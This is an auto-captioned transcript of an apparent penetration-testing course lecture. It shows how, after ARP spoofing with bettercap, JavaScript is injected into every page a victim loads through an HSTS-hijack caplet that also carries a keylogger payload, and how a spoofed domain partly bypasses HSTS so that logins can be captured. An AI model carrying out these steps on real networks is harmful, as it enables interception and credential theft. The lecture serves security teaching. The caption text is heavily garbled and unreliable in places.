1
00:00:00,970 --> 00:00:07,060
So far we saw a number of things that we can do once we become the man in the middle.

2
00:00:07,120 --> 00:00:09,780
So we saw how we can see anything.

3
00:00:09,820 --> 00:00:11,910
Target computer does on the network.

4
00:00:12,070 --> 00:00:18,580
So we were able to see the Web sites the usernames the passwords the images anything they load on their

5
00:00:18,580 --> 00:00:19,900
browser.

6
00:00:19,960 --> 00:00:25,830
We also saw that since we're the man in the middle we're able to redirect them to other Web sites.

7
00:00:25,840 --> 00:00:33,130
So whenever they request a domain we can redirect them to somewhere else by doing a DNS spoofing attack.

8
00:00:33,130 --> 00:00:41,890
Another really cool thing that we can do is modify the hasty e-mail modify the pages as they load on

9
00:00:41,890 --> 00:00:43,660
the target browser.

10
00:00:43,660 --> 00:00:49,090
Obviously this is all possible because we are the man in the middle because we're able to intercept

11
00:00:49,120 --> 00:00:55,420
all this data so we can wait for the hasty e-mail code which is the code that's responsible for loading

12
00:00:55,420 --> 00:00:56,590
web pages.

13
00:00:56,590 --> 00:01:03,340
And as it flows through our computer we can insert any piece of code that we want on the browser will

14
00:01:03,430 --> 00:01:05,760
execute this code.

15
00:01:05,890 --> 00:01:10,970
Now hasty e-mail is only responsible for rendering the elements that you see on the web page.

16
00:01:11,020 --> 00:01:15,920
So it's responsible for the buttons for the forums for the text.

17
00:01:15,940 --> 00:01:25,300
It doesn't really allow us to do much but modern browsers can execute javascript code javascript is

18
00:01:25,300 --> 00:01:32,170
a powerful program in language that we can use to do so many things we can actually modify the whole

19
00:01:32,170 --> 00:01:37,090
page remove elements or add elements into the page we can replace links.

20
00:01:37,180 --> 00:01:45,030
And this is actually what I did when I modified the HST s plugin so I added code that would replace

21
00:01:45,040 --> 00:01:52,840
the TTP s with TTP and I also added code that would replace the actual link the actual domain name with

22
00:01:52,840 --> 00:01:58,820
this poof domain name with the one with the DOT corn or whatever you set it to in the script.

23
00:01:58,870 --> 00:02:06,340
You can even use it to hook the browser to other Browser Exploitation frameworks which we can use to

24
00:02:06,340 --> 00:02:10,890
further exploit the target and even gain full control over their computer.

25
00:02:10,900 --> 00:02:17,320
And we'll see that later on in the course but for now I'm going to show you how to inject a very simple

26
00:02:17,320 --> 00:02:24,310
javascript code into the loaded pages and then we'll build up on that in future lectures and see how

27
00:02:24,310 --> 00:02:27,580
powerful and useful this can be.

28
00:02:27,580 --> 00:02:30,840
So right here I have my Kelly machine.

29
00:02:31,090 --> 00:02:37,660
And before I run buttercup and show you how to inject javascript first of all we need to have some javascript

30
00:02:37,660 --> 00:02:41,620
code to inject into the target browser.

31
00:02:41,620 --> 00:02:49,130
So I'm going to open a text editor and I'm going to write a very very simple javascript code like I

32
00:02:49,130 --> 00:02:53,210
said we will see how we can use this to run more useful code.

33
00:02:53,330 --> 00:02:58,910
But for now we're keeping this simple just to see how we can actually run javascript code.

34
00:02:58,910 --> 00:03:06,890
So all I'm going to do is alert open up bracket quotation mark and I'm going to say javascript test

35
00:03:08,900 --> 00:03:14,390
I'm going to close the quotation mark and close the bracket and add a semicolon.

36
00:03:14,390 --> 00:03:20,450
So right here this code all it's going to do is it's going to display a warning message an alert message

37
00:03:20,600 --> 00:03:22,870
saying javascript code.

38
00:03:22,970 --> 00:03:29,510
So since we're going to try to inject this code into all pages every time we load a web page we should

39
00:03:29,510 --> 00:03:32,970
see a message saying javascript test.

40
00:03:33,150 --> 00:03:34,440
Now I'm going to save this.

41
00:03:34,560 --> 00:03:41,550
So I'm gonna go to file save and I'm going to put this in my root directory and I'm just going to call

42
00:03:41,550 --> 00:03:48,450
it alert dot J S I'm going to hit enter and that is saved.

43
00:03:48,450 --> 00:03:56,740
Now in my root so if I quit it we can see we have the file right here so this is the file that contains

44
00:03:56,740 --> 00:04:03,610
the code that we want to inject into any web page that loads on the target computer.

45
00:04:03,610 --> 00:04:07,420
The next step is to go to our H S T S hijack plugin.

46
00:04:07,810 --> 00:04:14,710
So as I showed you before this was in user share Buttercup couplets H HST yes hijack.

47
00:04:14,710 --> 00:04:20,880
Make sure you use the one that I included in the resources not the one that comes built in with better

48
00:04:20,880 --> 00:04:25,210
cup because the built in one will not work as you wanted.

49
00:04:25,210 --> 00:04:29,570
So in here we have the H S T S hijack dot cap file.

50
00:04:29,620 --> 00:04:33,030
This is the configuration file for the whole plugin.

51
00:04:33,100 --> 00:04:39,970
So I'm going to right click this and open it with my text editor and in here what we want to modify

52
00:04:40,180 --> 00:04:42,660
is the payloads right here.

53
00:04:42,760 --> 00:04:48,670
So as you can see in here it's already injecting a javascript file called key logger dodgy yes.

54
00:04:48,850 --> 00:04:52,450
But we also want to inject our own code.

55
00:04:52,450 --> 00:04:58,490
So I'm going to add a comma here and I'm going to add star followed by a column.

56
00:04:58,630 --> 00:05:06,040
We added this tile right here to say that I want to inject my script into any page that the target loads

57
00:05:06,820 --> 00:05:10,240
if you want to inject your code into specific domains.

58
00:05:10,240 --> 00:05:17,740
Then you can remove the star and just lists the domains that you want to inject this code in right here.

59
00:05:17,740 --> 00:05:20,980
But like I said we want to inject this into all pages.

60
00:05:20,980 --> 00:05:23,090
So I'm going to put this as a star.

61
00:05:23,650 --> 00:05:30,940
And after the call on I'm going to put the location of the javascript file that I want to inject into

62
00:05:30,940 --> 00:05:32,540
the browser.

63
00:05:32,620 --> 00:05:38,440
So if we look back in here this is the file that we just created which is in root in my home.

64
00:05:38,440 --> 00:05:46,930
And it's called a letter G S so I'm going to put in here I'm just going to say forward slash root followed

65
00:05:46,930 --> 00:05:53,450
by alert that J S and that's it.

66
00:05:53,510 --> 00:05:59,260
I'm gonna save this control s and quit it control Q And we are ready to go.

67
00:05:59,540 --> 00:06:01,820
So I'm gonna go to my terminal.

68
00:06:01,910 --> 00:06:07,580
I'm gonna run Buttercup using the exact same command that we've been using so we're just giving it the

69
00:06:07,580 --> 00:06:14,380
interface as 88 0 and we're giving it our spook file to automatically run the ERP spoofing attack putting

70
00:06:14,410 --> 00:06:21,590
us in the middle of the connection and as you can see this is working with no ers so everything is perfect.

71
00:06:21,590 --> 00:06:28,040
Well I also want to do right now is run my s t s hijack plugin and as you know all we have to do is

72
00:06:28,040 --> 00:06:35,000
just type H S and tab this will auto complete I'm gonna hit enter and everything is running with no

73
00:06:35,000 --> 00:06:35,810
errors at all.

74
00:06:35,810 --> 00:06:38,060
So everything is perfect.

75
00:06:38,060 --> 00:06:43,790
And as you can see in here it saying that the payloads it's loading the javascript payloads are the

76
00:06:43,790 --> 00:06:44,410
key logger.

77
00:06:44,420 --> 00:06:51,260
This is the default one that the file already was loading and the one that we just specified which is

78
00:06:51,260 --> 00:06:54,200
in route alerts DOJ s.

79
00:06:54,410 --> 00:07:02,270
So now anytime our target loads any web page the whatever code we put in the alert the G S should be

80
00:07:02,270 --> 00:07:09,680
injected in the load this page and it should get executed the result of that should show us a simple

81
00:07:09,680 --> 00:07:12,940
message saying test javascript.

82
00:07:13,370 --> 00:07:15,460
So let's go to the target.

83
00:07:15,620 --> 00:07:22,170
And as usual a good idea is just to remove the browsing data just to make sure that nothing is cached.

84
00:07:22,310 --> 00:07:29,330
And I always like to first test with the simplest case and then move on to more complex scenarios.

85
00:07:29,330 --> 00:07:35,270
So first of all I'm going to test it against a normal hash TTP page so that there is nothing to bypass

86
00:07:35,300 --> 00:07:37,180
no encryption whatsoever.

87
00:07:37,220 --> 00:07:44,530
So we're just going to go to worldwide dot com and perfect as you can see we have an alert message in

88
00:07:44,530 --> 00:07:46,750
here telling us javascript test.

89
00:07:47,110 --> 00:07:56,590
So basically this means the javascript code in my alert or G as file got injected into this page so

90
00:07:56,740 --> 00:08:00,760
now that we verified it works against normal hash TTP pages.

91
00:08:00,970 --> 00:08:10,060
Let's go ahead and tested against a page that uses hash TTP as such as stack overflow dot com.

92
00:08:10,130 --> 00:08:10,730
Perfect.

93
00:08:10,730 --> 00:08:13,040
It's working as expected.

94
00:08:13,040 --> 00:08:22,070
Another example would be linked in dot com keep in mind these Web sites use hash TTP as and as you can

95
00:08:22,070 --> 00:08:27,530
see we're able to load them with no hash TTP s in here so over hash TTP only.

96
00:08:27,560 --> 00:08:33,290
So even if you log in right here you'll be able to get the user name and the password as shown before

97
00:08:34,760 --> 00:08:42,050
finally let's go and tested against h s t s website using the partial HST s bypass method that I showed

98
00:08:42,050 --> 00:08:42,230
you.

99
00:08:42,770 --> 00:08:48,560
So for that to work we'll need to go to Google first of all and we need to go to a Google domain that

100
00:08:48,560 --> 00:08:52,590
does not use h s t s similar to Google that I eat.

101
00:08:52,610 --> 00:08:55,980
This is actually the local Google Web site for Ireland.

102
00:08:56,120 --> 00:08:57,850
And as you can see the code works.

103
00:08:57,950 --> 00:08:58,790
This is fine.

104
00:08:58,790 --> 00:09:01,300
Google on uses hasty CPS anyway.

105
00:09:02,370 --> 00:09:04,400
But let's look for Facebook.

106
00:09:04,560 --> 00:09:10,940
Now we know Facebook uses heat as T S and because s t s is used.

107
00:09:11,220 --> 00:09:17,280
We should not be able to inject anything on the Web site because the browser will only loaded over a

108
00:09:17,280 --> 00:09:21,630
hasty G.P.S. but using our partial bypass method.

109
00:09:21,780 --> 00:09:28,710
If I click on Facebook from here as you can see the code gets executed because what we're loading right

110
00:09:28,740 --> 00:09:36,780
now is Facebook dot corn not Facebook dot com and as you can see we get a normal Facebook page again

111
00:09:36,810 --> 00:09:38,040
that looks identical.

112
00:09:38,250 --> 00:09:44,940
And if you log in you'll be able to get the user name and the password so Isaac can see.

113
00:09:44,950 --> 00:09:52,940
This will work against ETP on page 2 TPM speeches and even hitch as t as if the target searches for

114
00:09:52,940 --> 00:09:53,700
that Web site.

115
00:09:53,710 --> 00:09:57,230
Not if they put the domain name in here.

116
00:09:57,380 --> 00:10:05,540
So if the target comes in and literally types Facebook dot com manually and hit enter the browser will

117
00:10:05,540 --> 00:10:07,920
force the haste to G.P.S. connection.

118
00:10:07,940 --> 00:10:14,150
As you can see in here because like I said it has a preloaded list of Web sites that it can only load

119
00:10:14,270 --> 00:10:22,400
overhead TTP s and because the browser is established in a hasty CPS connection the data will be encrypted

120
00:10:22,640 --> 00:10:26,120
and therefore we won't be able to inject anything in it.